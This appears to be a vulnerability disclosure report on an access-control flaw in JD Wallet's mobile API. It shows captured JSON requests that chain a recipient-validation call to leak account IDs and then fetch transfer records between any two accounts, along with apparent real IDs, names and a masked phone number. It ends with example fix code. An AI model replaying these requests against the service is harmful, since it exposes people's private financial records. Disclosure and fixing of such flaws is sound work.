JD Wallet unauthorized query: viewing the transfer records between any two accounts (I stress: ANY two accounts!!)
1. When the client queries the transfer records between two accounts, the packet captured with Fiddler is as follows (side note: is it really unimportant that the HTTPS SSL certificate check can be trivially bypassed? Internally it was simply dismissed... so here I am at WooYun):
POST
Content-Type: application/json; charset=UTF-8
Content-Length: 309
Host: m.wangyin.com
Connection: Close
User-Agent: android
Accept-Encoding: gzip
{"desCustomerId":"360000000041109552","pageNum":1,"pageSize":10,"channel":"xiaomi","clientVersion":"4.1.0","customerId":"360000000215219468","macAddress":"14-f6-5a-d1-47-0f","auth":"f9957871d0a24d108e62015942f4d5b5","userId":"1200006529071","clientName":"android","deviceId":"866001023475214","version":"2.0"}
Notice anything? Yes, there is no Cookie, Key, Salt or anything of the kind. I then trimmed the packet down to the following, and it still returned results normally:
{"desCustomerId":"360000000041109552","pageNum":1,"pageSize":10,"channel":"","clientVersion":"","customerId":"360000000215219468","macAddress":"","auth":"","userId":"1200006529071","clientName":"","deviceId":"","version":""}
So only three values (desCustomerId, customerId and userId) are needed to query the transfer records between two accounts, as shown in the figure below:
Then the question is: knowing only a phone number, how do you obtain the two IDs of an arbitrary account? (For whatever reason, each account has a userID and a userID2..) I adjusted my glasses and thought of a detail: when making a transfer, doesn't the app validate the recipient account? Would that response return the validated account's two IDs? I tested it, and sure enough it does. The trimmed request packet is:
Content-Length: 301
{"desCustomerName":"u7RNVmqGzNrHVgn/vI/UpQ\u003d\u003d","channel":"","clientVersion":"","customerId":"360000000253312977","macAddress":"","auth":"f15d43c3986293cfc3885121ad2204e3","userId":"1200010338038","clientName":"","deviceId":"","version":""}
The phone number is encrypted, but that doesn't matter as long as the request goes through. It successfully returned the validated account's two IDs:
{"resultCode":0,"resultMsg":null,"resultData":{"validUser":true,"realNameUser":true,"desUserName":"*笑","accountName":"186****5417","historyTransfer":false,"desHeadIconUrl":"http://img20.360buyimg.com/payment/jfs/t1237/176/1060321396/24129/3671b827/557062baN2458bbda.png","inUserId":"1200006529071","inCustomerId":"360000000215219468"}}
That's it: we can obtain the two IDs of any account, and therefore the transfer records between any two accounts.
Below I use the internal accounts I got hold of a few days ago to test the transfer records between two of them:
刑同举's two IDs:
岳棱辉's two IDs:
Taking 刑同举 as the subject, view his transfer records with 岳棱辉. Construct the POST request:
Content-Length: 224
{"desCustomerId":"360000000064845496","pageNum":1,"pageSize":10,"channel":"","clientVersion":"","customerId":"360000000051318036","macAddress":"","auth":"","userId":"1000000003607","clientName":"","deviceId":"","version":""}
Request result:
Need I say more!
Proposed fix:
"Yes, there is no Cookie, Key, Salt or anything of the kind,"
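As an added illustration of the fix (example code, not the report's or JD Wallet's own), the transfer-history lookup in the vulnerable form described above beside a hardened one: the hardened handler takes the caller's identity from a server-side session (the session store, ledger, token name and request bodies are all constructed sample data) instead of trusting customerId/userId in the JSON body.

```python
import json

# Constructed sample data: session token -> the customer that actually authenticated.
SESSIONS = {
    "tok-A": {"customerId": "360000000215219468", "userId": "1200006529071"},
}

# Constructed ledger: (customerId, desCustomerId) -> transfer records.
TRANSFERS = {
    ("360000000215219468", "360000000041109552"): [{"amount": 100}],
    ("360000000051318036", "360000000064845496"): [{"amount": 250}],
}


def history(a, b):
    """Transfer records between two customers in either direction."""
    return TRANSFERS.get((a, b), []) + TRANSFERS.get((b, a), [])


def vulnerable_handler(body):
    """Mirrors the flaw in the report: the IDs in the body are trusted as-is
    and the 'auth' field is never validated, so any caller can query any pair."""
    req = json.loads(body)
    return {"resultCode": 0, "resultMsg": None,
            "resultData": history(req["customerId"], req["desCustomerId"])}


def hardened_handler(body, session_token):
    """Identity comes from the server-side session, never from the body, and the
    caller must be one of the two parties whose records are being requested."""
    session = SESSIONS.get(session_token)
    if session is None:
        return {"resultCode": 401, "resultMsg": "not authenticated", "resultData": None}
    req = json.loads(body)
    if req.get("customerId") != session["customerId"]:
        # The body names someone other than the authenticated customer: deny,
        # and log it, since a mismatch here is exactly the probing seen above.
        return {"resultCode": 403, "resultMsg": "forbidden", "resultData": None}
    return {"resultCode": 0, "resultMsg": None,
            "resultData": history(session["customerId"], req["desCustomerId"])}
```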